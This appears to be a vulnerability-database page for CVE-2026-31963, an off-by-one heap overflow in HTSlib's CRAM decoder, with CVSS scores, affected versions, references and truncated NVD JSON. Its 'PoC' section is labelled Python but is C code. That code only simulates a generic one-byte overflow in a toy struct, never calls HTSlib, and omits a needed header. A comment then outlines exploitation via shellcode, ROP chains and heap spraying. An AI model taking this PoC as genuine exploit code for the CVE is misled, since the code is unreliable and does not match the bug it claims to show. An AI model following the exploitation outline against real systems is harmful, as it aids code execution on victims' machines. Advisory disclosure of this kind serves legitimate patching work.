CVE-2026-31963

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. As one method of removing redundant data, CRAM uses reference-based compression so that instead of storing the full sequence for each alignment record it stores a location in an external reference sequence along with a list of differences to the reference at that location as a sequence of "features". When decoding these features, an out-by-one error in a test for CRAM features that appear beyond the extent of the CRAM record sequence could result in an invalid write of one attacker-controlled byte beyond the end of a heap buffer. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE

htslib < 1.21.1

htslib < 1.22.2

htslib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-31963 PoC - Heap Buffer Overflow in HTSlib CRAM decoding
// This PoC demonstrates the off-by-one error in CRAM feature decoding
// Note: This is a conceptual PoC; actual exploitation requires specific CRAM file crafting

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simplified CRAM container structure for demonstration
typedef struct {
    uint32_t container_size;
    uint32_t feature_count;
    uint8_t* features;
    uint32_t buffer_size;
} cram_container_t;

// Function to simulate vulnerable CRAM feature decoding
int decode_cram_features(cram_container_t* container) {
    // Allocate buffer based on expected feature count
    uint8_t* heap_buffer = (uint8_t*)malloc(container->feature_count);
    if (!heap_buffer) {
        return -1;
    }
    
    // Vulnerable code: off-by-one error in boundary check
    // The condition should be "i < container->feature_count" not "i <= ..."
    for (uint32_t i = 0; i <= container->feature_count; i++) {
        // This write can overflow when i == container->feature_count
        heap_buffer[i] = container->features[i];  // Off-by-one write!
    }
    
    free(heap_buffer);
    return 0;
}

// Function to create malicious CRAM container
cram_container_t* create_malicious_cram() {
    cram_container_t* container = (cram_container_t*)malloc(sizeof(cram_container_t));
    container->feature_count = 10;
    container->buffer_size = 10;
    container->features = (uint8_t*)malloc(container->feature_count);
    
    // Fill with controlled data
    memset(container->features, 0x41, container->feature_count);
    
    return container;
}

int main() {
    printf("CVE-2026-31963 PoC - HTSlib CRAM Heap Overflow\n");
    printf("This PoC demonstrates the off-by-one error in CRAM feature decoding\n");
    
    cram_container_t* malicious = create_malicious_cram();
    if (malicious) {
        decode_cram_features(malicious);
        free(malicious);
    }
    
    return 0;
}

/*
To exploit this vulnerability:
1. Create a malicious CRAM file with crafted features
2. Ensure feature_count is set to trigger the off-by-one condition
3. Include shellcode or ROP chain in the overflow data
4. Overwrite adjacent heap structures to gain control

Note: Actual exploitation requires detailed knowledge of heap layout
and may need heap spraying techniques to increase reliability.
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31963
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31963
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31963/
[4] VulDB https://vuldb.com/cve/CVE-2026-31963
[5] https://github.com/samtools/htslib/commit/8bcc9907be0f945ddc31796d64f078fa05456acd
[6] https://github.com/samtools/htslib/security/advisories/GHSA-qgqh-h2q9-7w3c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31963", "sourceIdentifier": "[email protected]", "published": "2026-03-18T19:16:04.440", "lastModified": "2026-03-19T14:50:54.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. As one method of removing redundant data, CRAM uses reference-based compression so that instead of storing the full sequence for each alignment record it stores a location in an external reference sequence along with a list of differences to the reference at that location as a sequence of \"features\". When decoding these features, an out-by-one error in a test for CRAM features that appear beyond the extent of the CRAM record sequence could result in an invalid write of one attacker-controlled byte beyond the end of a heap buffer. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo de bioinformática. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN. Como un método para eliminar datos redundantes, CRAM utiliza compresión basada en referencias de modo que, en lugar de almacenar la secuencia completa para cada registro de alineación, almacena una ubicación en una secuencia de referencia externa junto con una lista de diferencias con la referencia en esa ubicación como una secuencia de 'features'. Al decodificar estas 'features', un error por uno en una prueba para 'features' de CRAM que aparecen más allá del alcance de la secuencia de registro de CRAM podría resultar en una escritura inválida de un byte controlado por el atacante más allá del final de un búfer de pila. Explotar este error causa un desbordamiento de búfer de pila. Si un usuario abre un archivo diseñado para explotar este problema, podría provocar el bloqueo del programa o la sobrescritura de datos y estructuras de pila de formas no esperadas por el programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-129"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hts ... (truncated)